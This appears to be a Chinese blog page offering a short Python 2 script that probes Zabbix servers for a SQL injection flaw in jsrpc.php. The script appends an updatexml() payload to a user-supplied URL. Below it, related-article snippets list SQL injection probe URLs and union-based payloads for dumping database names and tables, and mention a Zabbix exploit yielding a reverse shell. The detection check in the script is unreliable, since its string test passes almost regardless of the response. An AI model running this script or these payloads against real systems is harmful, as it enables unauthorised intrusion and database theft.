zabbix(sql注入判断脚本)

#-*-coding:utf-8-*-
# code by anyun.org
import urllib
import re

def getHtml(url):
    page = urllib.urlopen(url)
    html = page.read()
    html = html.replace(‘\n‘, ‘‘)
    html = html.replace(‘       ‘, ‘ ‘)
    html = html.replace(‘   ‘, ‘‘)
    html = html.replace(‘   ‘, ‘‘)
    return html

url =raw_input(‘enter url:‘)
poc=‘jsrpc.php?type=9&method=screen.get&timestamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17‘
new_url=url+poc
try:
	if getHtml(new_url).find(‘flickerfreescreen‘)<>0:
		print ‘maybe successeed‘
	else:
		print ‘maybe unsuccessed‘
except:
	print ‘http error?‘

  

时间: 2024-10-11 06:30:37

zabbix(sql注入判断脚本)的相关文章

Zabbix sql注入漏洞脚本执行反弹shell

exp检测是否存在SQL注入漏洞[email protected]:~# python zabbix.py http://ip:9090/+------------------------------------------------------------+ Python Zabbix<3.0.4 SQL注入 Exploitsuccess+------------------------------------------------------------+Zabbix 存在SQL注入漏洞

python打造一个分析网站SQL注入的脚本

前言: 昨天晚上其实就已经写完代码.只不过向FB投稿了,打算延迟一晚上在写博客 所有才到今天早上写.好了,接下来进入正题. 思路: 1.从网站源码中爬取那些类适于:http://xxx.com/xx.php?id=xxx的链接 2.将这些爬取到的链接写入一个URL 3.加入payload 4.用正则过滤掉一些残缺不全的链接 5.将一些报错语句加入一个列表 6.从报错的语句中寻找错误 7.判断字符型注入或数字型注入 代码: 1 import requests,re,time,os 2 from t

SQL注入判断方法总结(持续更新)

http://e.com/1.php?id=1 http://e.com/1.php?id=1-- sd http://e.com/1.php?id=aaa http://e.com/1.php?id=aaa'-- sd http://e.com/1.php?id=aaa http://e.com/1.php?id=aaa' ' http://e.com/1.php?id=aaa'||' http://e.com/1.php?id=aaa'%2b' id=1 and 1=if(1=2,1,(se

SQL注入判断数据库类型

页面返回的报错信息判断 默认端口判断 Oracle port:1521 SQL Server port:1433 MySQL port:3306 数据库特有的数据表判断 oracle数据库 http://127.0.0.1/test.php?id=1 and (select count(*) from sys.user_tables)>0 and 1=1 mysql数据库(mysql版本在5.0以上) http://127.0.0.1/test.php?id=1 and (select coun

[经验技巧] “php+mysql+apache”环境搭建及&quot;手动SQL注入&quot;,20180527-0

[经验技巧] "php+mysql+apache"环境搭建及"手动SQL注入" 1."php+mysql+apache"环境搭建 环境载体:虚拟机Window7 Service Pack 1 旗舰版 下载"phpStudy (php5.2) " 链接:http://www.phpstudy.net/phpstudy/phpStudy(PHP5.2).zip 文件见附件1. 安装"phpStudy (php5.2) &

MySQL SQL 注入

如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本博文将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符. 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理. 以下实例中,输入的用户名必须为字母.数字及下划线的组合,且用户名长度为 8 到

MySQL 及 SQL 注入

如果您通过网页获取用户输入的数据并将其插入一个MySQL数据库,那么就有可能发生SQL注入安全的问题. 本章节将为大家介绍如何防止SQL注入,并通过脚本来过滤SQL中注入的字符. 所谓SQL注入,就是通过把SQL命令插入到Web表单递交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令. 我们永远不要信任用户的输入,我们必须认定用户输入的数据都是不安全的,我们都需要对用户输入的数据进行过滤处理. 以下实例中,输入的用户名必须为字母.数字及下划线的组合,且用户名长度为 8 到

SQL注入详解-转发

转发自飞天小子如有侵权请联系删除 1:什么是SQL注入 SQL注入是一种将SQL代码插入或添加到应用(用户)的输入参数中的攻击,之后再将这些参数传递给后台的SQL服务器加以解析并执行. www.xx.com/news.php?id=1 www.xx.com/news.php?id=1 and 1=1 这里我们来理解一下SQL注入 首先,SQL注入常年蝉联OWASP排行榜第一名~ SQL注入产生的过程是怎样的呢?见下图 SQL注入的危害有哪些呢? 数据库信息泄露 网页篡改 网站被挂马 数据库被恶意

常规SQL注入脚本

一:union报错注入 猜字段长度:order by 28 先显示位http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,9 当前数据库:http://127.0.0.1/sql.php?cmd=-1 UNION SELECT 1,2,3,4,5,6,7,8,database() 爆数据表: http://127.0.0.1/sql.php?cmd=1 and 1=2 UNION SELECT 1,2,3,4,5,6,7,8,g